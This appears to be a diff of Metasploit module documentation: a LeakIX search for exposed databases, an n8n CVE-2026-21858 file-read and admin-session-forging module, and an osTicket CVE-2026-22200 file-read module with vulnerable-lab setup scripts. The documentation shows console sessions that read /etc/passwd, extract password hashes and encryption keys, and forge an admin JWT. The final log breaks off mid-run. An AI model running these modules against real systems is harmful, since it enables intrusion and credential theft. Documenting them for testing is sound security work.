### PLUGINS - List available plugins
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set ACTION PLUGINS
|
||||
ACTION => PLUGINS
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching available plugins...
|
||||
[*] Found 45 plugins
|
||||
|
||||
LeakIX Plugins
|
||||
===============
|
||||
|
||||
Plugin Name
|
||||
-----------
|
||||
ApacheStatusPlugin
|
||||
CouchDbOpenPlugin
|
||||
ElasticSearchOpenPlugin
|
||||
GitConfigPlugin
|
||||
HttpOpenProxy
|
||||
MongoOpenPlugin
|
||||
MysqlOpenPlugin
|
||||
SshOpenPlugin
|
||||
...
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### BULK - Stream bulk leak results (Pro key required)
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set ACTION BULK
|
||||
ACTION => BULK
|
||||
msf6 auxiliary(gather/leakix_search) > set QUERY +country:"Germany"
|
||||
QUERY => +country:"Germany"
|
||||
msf6 auxiliary(gather/leakix_search) > set MAXRESULTS 50
|
||||
MAXRESULTS => 50
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Streaming bulk results (Pro API required, leak scope)...
|
||||
[*] Streamed 50 events...
|
||||
[*] Reached MAXRESULTS limit (50)
|
||||
[*] Bulk results: 50 results
|
||||
|
||||
LeakIX Results
|
||||
==============
|
||||
|
||||
IP:Port Protocol Host Country Organization Software Type Source
|
||||
------ -------- ---- ------- ------------ -------- ---- ------
|
||||
x.x.x.x:9200 http elastic.example.de Germany Hetzner Online GmbH Elastic 7.10 leak ElasticSearchOpenPlugin
|
||||
x.x.x.x:27017 mongodb mongo.example.de Germany OVH SAS MongoDB 4.4 leak MongoOpenPlugin
|
||||
...
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### Saving results to database
|
||||
|
||||
Set `DATABASE true` to populate the Metasploit services database with discovered hosts and services:
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/leakix_search) > set DATABASE true
|
||||
DATABASE => true
|
||||
msf6 auxiliary(gather/leakix_search) > run
|
||||
|
||||
[*] Fetching page 1/1...
|
||||
[+] Got 20 results from page 1 (total: 20)
|
||||
[*] Total: 20 results
|
||||
...
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
msf6 auxiliary(gather/leakix_search) > services
|
||||
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
x.x.x.x 3306 tcp mysql open MySQL 5.7
|
||||
x.x.x.x 22 tcp ssh open OpenSSH 8.4
|
||||
...
|
||||
```
|
||||
@@ -0,0 +1,122 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability
|
||||
in the n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed
|
||||
"Ni8mare", is a content-type confusion flaw in webhook request handling that allows attackers to
|
||||
achieve arbitrary file read. According to the published write-up, this CVE can be used to attain
|
||||
unauthenticated RCE; however, that requires additional steps. The unauthenticated file read is
|
||||
bound by two conditions: a way to extract the loaded file (either via an exposed chatbot or another
|
||||
means) and an exposed file upload form. Those conditions are
|
||||
[rarely actual](https://horizon3.ai/attack-research/attack-blogs/the-ni8mare-test-n8n-rce-under-the-microscope-cve-2026-21858/) at
|
||||
the same time. This module tries to use the CVE for different scenarios - privilege escalation,
|
||||
where a low-privileged user is allowed to read an arbitrary file and eventually gain admin access
|
||||
by forging a ticket.
|
||||
|
||||
To start vulnerable n8n container, run: `docker run -p5678:5678 n8nio/n8n:1.120.0`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the vulnerable n8n instance
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/gather/ni8mare_cve_2026_21858`
|
||||
1. Do: `set USERNAME [username]`
|
||||
1. Do: `set PASSWORD [password]`
|
||||
1. Do: `set ACTION [EXTRACT_SESSION/READ_FILE]`
|
||||
1. Do: `set SPOOFED_USERNAME [username]` or `set TARGET_FILENAME [username]`
|
||||
1. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### EMAIL
|
||||
|
||||
Email of user, which will create a malicious workflow to execute arbitrary file read.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
Password of user, which will create a malicious workflow to execute arbitrary file read.
|
||||
|
||||
## SPOOFED_EMAIL
|
||||
|
||||
If EXTRACT_SESSION action is set, the SPOOFED_EMAIL defines a user for which a spoofed session will be created.
|
||||
|
||||
## TARGET_FILENAME
|
||||
|
||||
If READ_FILE action is set, this option represent a file, whose content will be extracted.
|
||||
|
||||
## N8N_CONFIG_DIR
|
||||
|
||||
Absolute path to config directory for n8n.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### File read
|
||||
|
||||
```
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set RPORT 5678
|
||||
RPORT => 5678
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set email admin@gmail.com
|
||||
email => admin@gmail.com
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set password Supersecret9
|
||||
password => Supersecret9
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set action READ_FILE
|
||||
saction => READ_FILE
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > set TARGET_FILENAME /etc/passwd
|
||||
rTARGET_FILENAME => /etc/passwd
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Creating file upload workflow...
|
||||
[*] Cleaning up workflow s8d1du2IUfRXpicE...
|
||||
[+] Results saved to: /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
|
||||
[*] exec: cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
|
||||
|
||||
root:x:0:0:root:/root:/bin/sh
|
||||
bin:x:1:1:bin:/bin:/sbin/nologin
|
||||
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
||||
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
||||
sync:x:5:0:sync:/sbin:/bin/sync
|
||||
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||||
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||
mail:x:8:12:mail:/var/mail:/sbin/nologin
|
||||
news:x:9:13:news:/usr/lib/news:/sbin/nologin
|
||||
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
|
||||
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
|
||||
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
|
||||
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
|
||||
games:x:35:35:games:/usr/games:/sbin/nologin
|
||||
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
|
||||
guest:x:405:100:guest:/dev/null:/sbin/nologin
|
||||
nobody:x:65534:65534:nobody:/:/sbin/nologin
|
||||
node:x:1000:1000::/home/node:/bin/sh
|
||||
```
|
||||
|
||||
### Session extraction
|
||||
```
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858)> set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858)> set RPORT 5678
|
||||
RPORT => 5678
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858)> set email admin@gmail.com
|
||||
email => admin@gmail.com
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858)> set password Supersecret9
|
||||
password => Supersecret9
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858)> set spoofed_email admin@gmail.com
|
||||
spoofed_email => admin@gmail.com
|
||||
msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Creating file upload workflow...
|
||||
[*] Cleaning up workflow eEqTclj3rxAS1KCb...
|
||||
[+] Database saved to: /home/ms/.msf4/loot/20260204123341_default_127.0.0.1_database.sqlite_959168.bin
|
||||
[+] Extracted user ID: 9701b0fb-dcf0-4431-93f2-570dbe48b102
|
||||
[+] Extracted password hash: $2a$10$J7g5lE6/8P5K/58PR2YC..c0g02QEU5MTsFWqhUqf4.3p7sBrM4oW
|
||||
[*] Creating file upload workflow...
|
||||
[*] Cleaning up workflow uBmS93fou1Xw2554...
|
||||
[+] Config file saved to: /home/ms/.msf4/loot/20260204123345_default_127.0.0.1_n8n.config_124017.bin
|
||||
[+] Extracted encryption key: vEg+NXiKzB+E0w7isnvcM7TauaTwM4QF
|
||||
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
|
||||
[+] JWT ticket as admin@gmail.com: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijk3MDFiMGZiLWRjZjAtNDQzMS05M2YyLTU3MGRiZTQ4YjEwMiIsImhhc2giOiJMdzhCVHJKcEhRIn0.sxIbgD9ShEGvHbax2nbHHYv3CBXGLeNlx1dGbCCPttw
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,1030 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Enhancesoft osTicket is a widely-used open-source support ticket system.
|
||||
This module exploits an arbitrary file read vulnerability (CVE-2026-22200), which affects Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7. In vulnerable deployments, this issue can often be triggered by unauthenticated or guest users when ticket self-service is enabled; however, the Metasploit module itself currently uses an authenticated workflow and requires valid osTicket credentials.
|
||||
|
||||
This vulnerability arises due to improper sanitization of PHP filter expressions within rich-text HTML ticket submissions before they are processed by the mPDF PDF generator during export.
|
||||
|
||||
To exploit this vulnerability, an attacker submits a ticket containing malicious payload syntax (such as `php://` or `phar://` bypasses like `php:\\` or `./php://`). When the ticket is subsequently exported to PDF, the mPDF library reads the targeted local file and embeds its contents within the generated PDF as a bitmap image. This allows remote attackers to disclose sensitive local files, such as `/etc/passwd` or `include/ost-config.php`, in the context of the osTicket web application user.
|
||||
|
||||
In real-world deployments, this issue may be exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled. The provided Metasploit module, however, models an authenticated scenario and assumes you have working staff or admin credentials with permission to create and export tickets to PDF
|
||||
|
||||
## Installation
|
||||
|
||||
### Using any Ubuntu VM (Recommended Way)
|
||||
|
||||
1. OsTicket can be installed with the given script on any Ubuntu VM:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
|
||||
set -e # Exit on error
|
||||
|
||||
# Colors for verbose output
|
||||
GREEN='\033[0;32m'
|
||||
BLUE='\033[0;34m'
|
||||
RED='\033[0;31m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
log() {
|
||||
echo -e "${BLUE}[+] $1${NC}"
|
||||
}
|
||||
|
||||
success() {
|
||||
echo -e "${GREEN}[OK] $1${NC}"
|
||||
}
|
||||
|
||||
error() {
|
||||
echo -e "${RED}[ERROR] $1${NC}"
|
||||
exit 1
|
||||
}
|
||||
|
||||
DB_NAME="osticket_db"
|
||||
DB_USER="osticket_user"
|
||||
DB_PASS="P@ssw0rd123!" # Change this if needed
|
||||
INSTALL_DIR="/var/www/html/osticket"
|
||||
OSTICKET_VER="v1.18.1"
|
||||
|
||||
DOWNLOAD_URL="https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip"
|
||||
|
||||
|
||||
if [ "$EUID" -ne 0 ]; then
|
||||
error "Please run as root (sudo ./setup_osticket_cve_env.sh)"
|
||||
fi
|
||||
|
||||
|
||||
log "Updating system packages..."
|
||||
apt-get update -q
|
||||
|
||||
log "Installing dependencies (software-properties-common, git, unzip, curl)..."
|
||||
apt-get install -y software-properties-common git unzip curl
|
||||
|
||||
|
||||
log "Adding ondrej/php repository to ensure PHP 8.2 availability..."
|
||||
add-apt-repository -y ppa:ondrej/php
|
||||
apt-get update -q
|
||||
|
||||
|
||||
log "Installing Apache, MariaDB, and PHP 8.2 extensions..."
|
||||
|
||||
apt-get install -y \
|
||||
apache2 \
|
||||
mariadb-server \
|
||||
php8.2 \
|
||||
php8.2-mysql \
|
||||
php8.2-mbstring \
|
||||
php8.2-gd \
|
||||
php8.2-intl \
|
||||
php8.2-apcu \
|
||||
php8.2-xml \
|
||||
php8.2-curl \
|
||||
php8.2-zip \
|
||||
php8.2-imap \
|
||||
php8.2-bcmath \
|
||||
libapache2-mod-php8.2
|
||||
|
||||
success "LAMP stack installed."
|
||||
|
||||
|
||||
log "Configuring MySQL/MariaDB..."
|
||||
service mysql start
|
||||
|
||||
|
||||
mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};"
|
||||
mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';"
|
||||
mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';"
|
||||
mysql -u root -e "FLUSH PRIVILEGES;"
|
||||
|
||||
success "Database '${DB_NAME}' created with user '${DB_USER}'."
|
||||
|
||||
|
||||
log "Downloading osTicket ${OSTICKET_VER}..."
|
||||
mkdir -p /tmp/osticket_install
|
||||
wget -O /tmp/osticket_install/osticket.zip "${DOWNLOAD_URL}"
|
||||
|
||||
if [ ! -f /tmp/osticket_install/osticket.zip ]; then
|
||||
error "Download failed. Check internet connection or URL."
|
||||
fi
|
||||
|
||||
log "Cleaning up old installations..."
|
||||
rm -rf ${INSTALL_DIR}
|
||||
mkdir -p ${INSTALL_DIR}
|
||||
|
||||
log "Extracting files..."
|
||||
unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/
|
||||
|
||||
cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
|
||||
|
||||
|
||||
log "Preparing configuration file..."
|
||||
cd ${INSTALL_DIR}/include
|
||||
if [ -f ost-sampleconfig.php ]; then
|
||||
cp ost-sampleconfig.php ost-config.php
|
||||
else
|
||||
error "ost-sampleconfig.php not found! Extraction might have failed."
|
||||
fi
|
||||
|
||||
|
||||
chmod 0666 ost-config.php
|
||||
|
||||
|
||||
log "Configuring Apache Virtual Host..."
|
||||
|
||||
CONF_FILE="/etc/apache2/sites-available/osticket.conf"
|
||||
|
||||
cat > ${CONF_FILE} <<EOF
|
||||
<VirtualHost *:80>
|
||||
ServerAdmin admin@localhost
|
||||
DocumentRoot ${INSTALL_DIR}
|
||||
|
||||
<Directory ${INSTALL_DIR}>
|
||||
Options Indexes FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Require all granted
|
||||
</Directory>
|
||||
|
||||
ErrorLog \${APACHE_LOG_DIR}/error.log
|
||||
CustomLog \${APACHE_LOG_DIR}/access.log combined
|
||||
</VirtualHost>
|
||||
EOF
|
||||
|
||||
|
||||
a2dissite 000-default.conf
|
||||
a2ensite osticket.conf
|
||||
a2enmod rewrite
|
||||
|
||||
|
||||
chown -R www-data:www-data ${INSTALL_DIR}
|
||||
chmod -R 755 ${INSTALL_DIR}
|
||||
|
||||
chmod 0666 ${INSTALL_DIR}/include/ost-config.php
|
||||
|
||||
log "Restarting Apache..."
|
||||
service apache2 restart
|
||||
|
||||
|
||||
rm -rf /tmp/osticket_install
|
||||
|
||||
|
||||
IP_ADDR=$(hostname -I | cut -d' ' -f1)
|
||||
|
||||
echo "================================================================="
|
||||
echo -e "${GREEN} INSTALLATION COMPLETE ${NC}"
|
||||
echo "================================================================="
|
||||
echo -e "Target: osTicket ${OSTICKET_VER} (Vulnerable to CVE-2026-22200)"
|
||||
echo -e "Access the setup wizard at: ${BLUE}http://${IP_ADDR}/setup/${NC}"
|
||||
echo "-----------------------------------------------------------------"
|
||||
echo "Database Details for the Wizard:"
|
||||
echo -e "MySQL Database: ${BLUE}${DB_NAME}${NC}"
|
||||
echo -e "MySQL Username: ${BLUE}${DB_USER}${NC}"
|
||||
echo -e "MySQL Password: ${BLUE}${DB_PASS}${NC}"
|
||||
echo "-----------------------------------------------------------------"
|
||||
echo "Setup Instructions:"
|
||||
echo "1. Open the URL above in your browser."
|
||||
echo "2. Ensure all prerequisites show a green checkmark."
|
||||
echo "3. Fill in the 'System Settings' (use any admin info)."
|
||||
echo "4. Fill in the 'Database Settings' using the credentials above."
|
||||
echo "5. Click 'Install Now'."
|
||||
echo "================================================================="
|
||||
```
|
||||
|
||||
2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
|
||||
|
||||
**System Settings**
|
||||
This section defines the basic identity of your helpdesk:
|
||||
- **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
|
||||
- **Default Email:** The primary email address from which the system will send outgoing notifications.
|
||||
|
||||
**Admin User**
|
||||
This section creates the master administrator account for the osTicket backend:
|
||||
- **First Name & Last Name:** The administrator's real name.
|
||||
- **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
|
||||
- **Username:** The login username for the admin panel.
|
||||
- **Password & Retype Password:** The password for the admin account.
|
||||
|
||||
**Database Settings**
|
||||
This section connects the application to your pre-configured MySQL/MariaDB database:
|
||||
- **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
|
||||
- **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
|
||||
- **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
|
||||
- **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
|
||||
- **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
|
||||
|
||||
Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
|
||||
|
||||
3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
|
||||
|
||||
4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
|
||||
|
||||
|
||||
### Using Docker
|
||||
|
||||
OsTicket does not ship their official docker so have a monolithic setup is the best way to install it.
|
||||
|
||||
1. Use the following Dockerfile to setup:
|
||||
|
||||
```Dockerfile
|
||||
FROM ubuntu:22.04
|
||||
|
||||
ENV DEBIAN_FRONTEND=noninteractive
|
||||
|
||||
ENV DB_NAME="osticket_db" \
|
||||
DB_USER="osticket_user" \
|
||||
DB_PASS="P@ssw0rd123!" \
|
||||
INSTALL_DIR="/var/www/html/osticket" \
|
||||
OSTICKET_VER="v1.18.1"
|
||||
|
||||
RUN apt-get update -q && apt-get install -y \
|
||||
software-properties-common \
|
||||
git \
|
||||
unzip \
|
||||
curl \
|
||||
wget \
|
||||
nano \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN add-apt-repository -y ppa:ondrej/php && apt-get update -q
|
||||
|
||||
RUN apt-get install -y \
|
||||
apache2 \
|
||||
mariadb-server \
|
||||
php8.2 \
|
||||
php8.2-mysql \
|
||||
php8.2-mbstring \
|
||||
php8.2-gd \
|
||||
php8.2-intl \
|
||||
php8.2-apcu \
|
||||
php8.2-xml \
|
||||
php8.2-curl \
|
||||
php8.2-zip \
|
||||
php8.2-imap \
|
||||
php8.2-bcmath \
|
||||
libapache2-mod-php8.2 \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN service mariadb start && \
|
||||
sleep 3 && \
|
||||
mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};" && \
|
||||
mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';" && \
|
||||
mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';" && \
|
||||
mysql -u root -e "FLUSH PRIVILEGES;"
|
||||
|
||||
|
||||
RUN mkdir -p /tmp/osticket_install && \
|
||||
wget -O /tmp/osticket_install/osticket.zip "https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip" && \
|
||||
rm -rf ${INSTALL_DIR} && \
|
||||
mkdir -p ${INSTALL_DIR} && \
|
||||
unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/ && \
|
||||
cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
|
||||
|
||||
RUN cp ${INSTALL_DIR}/include/ost-sampleconfig.php ${INSTALL_DIR}/include/ost-config.php
|
||||
|
||||
RUN sed -i "s/error_reporting(E_ALL & ~E_NOTICE);/error_reporting(E_ALL \& ~E_NOTICE \& ~E_DEPRECATED \& ~E_WARNING);/" ${INSTALL_DIR}/bootstrap.php
|
||||
|
||||
RUN echo "<VirtualHost *:80>\n\
|
||||
ServerAdmin admin@localhost\n\
|
||||
DocumentRoot ${INSTALL_DIR}\n\
|
||||
<Directory ${INSTALL_DIR}>\n\
|
||||
Options Indexes FollowSymLinks MultiViews\n\
|
||||
AllowOverride All\n\
|
||||
Require all granted\n\
|
||||
</Directory>\n\
|
||||
ErrorLog \${APACHE_LOG_DIR}/error.log\n\
|
||||
CustomLog \${APACHE_LOG_DIR}/access.log combined\n\
|
||||
</VirtualHost>" > /etc/apache2/sites-available/osticket.conf
|
||||
|
||||
RUN a2dissite 000-default.conf && \
|
||||
a2ensite osticket.conf && \
|
||||
a2enmod rewrite && \
|
||||
chown -R www-data:www-data ${INSTALL_DIR} && \
|
||||
chmod -R 755 ${INSTALL_DIR} && \
|
||||
chmod 0666 ${INSTALL_DIR}/include/ost-config.php
|
||||
|
||||
RUN rm -rf /tmp/osticket_install
|
||||
|
||||
RUN echo '#!/bin/bash\n\
|
||||
# Start MariaDB service\n\
|
||||
service mariadb start\n\
|
||||
# Wait for DB to be fully ready\n\
|
||||
sleep 2\n\
|
||||
# Start Apache in the foreground to keep the container alive\n\
|
||||
source /etc/apache2/envvars\n\
|
||||
exec apache2 -D FOREGROUND\n\
|
||||
' > /usr/local/bin/entrypoint.sh && chmod +x /usr/local/bin/entrypoint.sh
|
||||
|
||||
EXPOSE 80
|
||||
|
||||
CMD ["/usr/local/bin/entrypoint.sh"]
|
||||
```
|
||||
|
||||
2. Build and run with the following commands:
|
||||
```bash
|
||||
docker build -t osticket-cve-env .
|
||||
docker run -d -p 8080:80 --name osticket_vuln_server osticket-cve-env
|
||||
```
|
||||
|
||||
2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost:8080/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
|
||||
|
||||
**System Settings**
|
||||
This section defines the basic identity of your helpdesk:
|
||||
- **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
|
||||
- **Default Email:** The primary email address from which the system will send outgoing notifications.
|
||||
|
||||
**Admin User**
|
||||
This section creates the master administrator account for the osTicket backend:
|
||||
- **First Name & Last Name:** The administrator's real name.
|
||||
- **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
|
||||
- **Username:** The login username for the admin panel.
|
||||
- **Password & Retype Password:** The password for the admin account.
|
||||
|
||||
**Database Settings**
|
||||
This section connects the application to your pre-configured MySQL/MariaDB database:
|
||||
- **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
|
||||
- **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
|
||||
- **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
|
||||
- **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
|
||||
- **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
|
||||
|
||||
Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
|
||||
|
||||
3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
|
||||
|
||||
4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
|
||||
|
||||
## Verification Steps
|
||||
1. Install OsTicket using either of the steps mentioned above.
|
||||
2. Start `msfconsole`.
|
||||
3. Do: `use auxiliary/gather/osticket_arbitrary_file_read`
|
||||
4. Set the `RHOSTS` and `RPORT` options as necessary
|
||||
5. Set the `TICKET_NUMBER` with the ticket number gathered from the website. If not set
|
||||
6. Set the `USERNAME` and `PASSWORD` from the registered user.
|
||||
7. Set the full file name that you want to fetch in the `FILE`.
|
||||
8. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### FILE
|
||||
The absolute file path of the target file to be retrieved from the osTicket server. By default, this is set to `/etc/passwd`.
|
||||
|
||||
### LOGIN_PORTAL
|
||||
Specifies which osTicket portal to use for authentication. osTicket maintains separate login interfaces for staff/agents (`scp`) and end-users (`client`). Setting this to auto allows the module to automatically determine the correct portal based on the authentication flow or provided credentials.
|
||||
|
||||
### MAX_REDIRECTS
|
||||
The maximum number of HTTP redirects the module will follow while navigating the authentication process and executing the payload. The default is `3`.
|
||||
|
||||
### MAX_TICKET_ID
|
||||
Specifies the upper limit when brute-forcing the internal database ID of a ticket. Since the internal database ID is often required for exploitation but isn't always publicly visible, the module will attempt to brute-force it up to this boundary if `TICKET_ID` is not explicitly provided. The default is `20`.
|
||||
|
||||
### TICKET_NUMBER
|
||||
The public-facing, user-visible ticket number (e.g., `978554`) that the module will target to inject the payload and trigger the vulnerability.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### With new non-administrator user
|
||||
```
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME test
|
||||
USERNAME => test
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
|
||||
TICKET_NUMBER => 527686
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
|
||||
RHOSTS => http://localhost:8080/
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
|
||||
PASSWORD => administrator
|
||||
msf auxiliary(gather/osticket_arbitrary_file_read) > run
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] is_osticket?: Response code=200, body length=4943
|
||||
[*] is_osticket?: osTicket signature FOUND in response body
|
||||
[!] The service is running, but could not be validated. Target appears to be an osTicket installation
|
||||
[*] Target: 127.0.0.1:8080
|
||||
[*] File to extract: /etc/passwd
|
||||
[*] Attempting authentication...
|
||||
[*] do_login: portal preference=auto, base_uri=/, username=test
|
||||
[*] do_login: Trying staff panel (/scp/) login...
|
||||
[*] osticket_login_scp: GET /scp/login.php
|
||||
[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=hni5kfvm5hin0dpkvc7suh70dm;
|
||||
[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=dc50fdaa52a6f0aefa0adb14af2698ad89c95501
|
||||
[*] osticket_login_scp: POST /scp/login.php with userid=test
|
||||
[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
|
||||
[-] osticket_login_scp: Login FAILED (still see login form)
|
||||
[*] do_login: Staff panel login failed
|
||||
[*] do_login: Trying client portal login...
|
||||
[*] osticket_login_client: GET /login.php
|
||||
[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
|
||||
[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=111e06bd5a313466a4f550f9d8014ebb8ba90e8e
|
||||
[*] osticket_login_client: POST /login.php with luser=test
|
||||
[*] osticket_login_client: POST response code=302, body contains luser=false
|
||||
[+] osticket_login_client: Login SUCCESS
|
||||
[+] do_login: Client portal login succeeded, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
|
||||
[+] Authenticated via client portal
|
||||
[*] Locating ticket...
|
||||
[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
|
||||
[*] find_ticket_id: Using cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
|
||||
[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
|
||||
[*] find_ticket_id: Body Length:
|
||||
6856
|
||||
[+] find_ticket_id: Found ticket ID=2 from listing page
|
||||
[+] Ticket #527686 has internal ID: 2
|
||||
[*] Generating PHP filter chain payload...
|
||||
[*] Payload generated (13646 bytes)
|
||||
[*] Submitting payload as ticket reply...
|
||||
[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
|
||||
[*] submit_ticket_reply: GET response code=200, body=9605 bytes
|
||||
[*] extract_csrf_token: Searching HTML (9605 bytes) for __CSRFToken__
|
||||
[+] extract_csrf_token: Found token=f9ae5cdbe887f403e26489ec4fbb2d1d27234797
|
||||
